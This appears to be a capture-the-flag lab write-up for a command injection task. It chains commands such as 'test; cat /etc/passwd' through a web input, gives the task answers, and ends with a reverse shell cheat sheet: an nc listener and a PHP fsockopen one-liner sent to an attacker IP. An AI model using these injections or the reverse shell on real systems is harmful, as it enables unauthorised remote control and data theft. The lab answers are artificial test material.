Skip to content

Task 5

What strange text file is in the website root directory?

Section titled “What strange text file is in the website root directory? ”
test; ls

drpepper.txt

How many non-root/non-service/non-daemon users are there?

Section titled “How many non-root/non-service/non-daemon users are there? ”
test; cat /etc/passwd

0

test; whoami

www-data

test; cat /etc/passwd |grep www-data

/usr/sbin/nologin

test ; cat /etc/os-release
or
test ; lsb_release -a

18.04.4

Section titled “Print out the MOTD. What favorite beverage is shown? ”
test ; locate 00-header
test ; cat /etc/update-motd.d/00-header

Dr Pepper

Reverse Shell Cheat Sheet

  1. On your machine
  • Open a localport on your machine
nc -lvnp 9001
  1. On vulnerable webpage
  • Spawn this remote shell in the search input.

Replace 10.18.1.159 with your own VPN IP

test; php -r '$sock=fsockopen("10.18.1.159",9001);`sh <&3 >&3 2>&3`;'